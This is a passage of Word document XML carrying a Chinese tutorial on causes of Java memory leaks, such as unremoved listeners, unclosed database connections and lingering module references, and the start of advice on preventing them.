          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编程中，我们都需要和监听器打交道，通常一个应用当中会用到很多监听器，我们会调用一个控件的诸如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>addXXXListener()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等方法来增加监听器，但往往在释放对象的时候却没有记住去删除这些监听器，从而增加了内存泄漏的机会。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>物理连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一些物理连接，比如数据库连接和网络连接，除非其显式的关闭了连接，否则是不会自动被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">GC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回收的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库连接一般用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DataSource.getConnection()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来创建，当不再使用时必须用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Close()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法来释放，因为这些连接是独立于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的。对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象可以不进行显式回收，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一定要显式回收，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在任何时候都无法自动回收，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一旦回收，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象就会立即为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。但是如果使用连接池，情况就不一样了，除了要显式地关闭连接，还必须显式地关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultset Statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象（关闭其中一个，另外一个也会关闭），否则就会造成大量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象无法释放，从而引起内存泄漏。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内部类和外部模块等的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内部类的引用是比较容易遗忘的一种，而且一旦没释放可能导致一系列的后继类对象没有释放。对于程序员而言，自己的程序很清楚，如果发现内存泄漏，自己对这些对象的引用可以很快定位并解决，但是现在的应用软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并非一个人实现，模块化的思想在现代软件中非常明显，所以程序员要小心外部模块不经意的引用，例如程序员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>负责</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模块，调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模块的一个方法如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public void registerMsg(Object b);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这种调用就要非常小心了，传入了一个对象，很可能模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就保持了对该对象的引用，这时候就需要注意模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是否提供相应的操作去除引用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>预防和检测内存漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在了解了引起内存泄漏的一些原因后，应该尽可能地避免和发现内存泄漏。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>好的编码习惯。最基本的建议就是尽早释放无用对象的引用，大多数程序员在使用临时变量的时候，都是让引用变量在退出活动域后，自动设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。在使用这种方式时候，必须特别注意一些复杂的对象图，例如数组、列、树、图等，这些对象之间有相互引用关系较为复杂。对于这类对象，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">GC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回收它们一般效率较低。如果程序允许，尽早将不用的引用对象赋为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
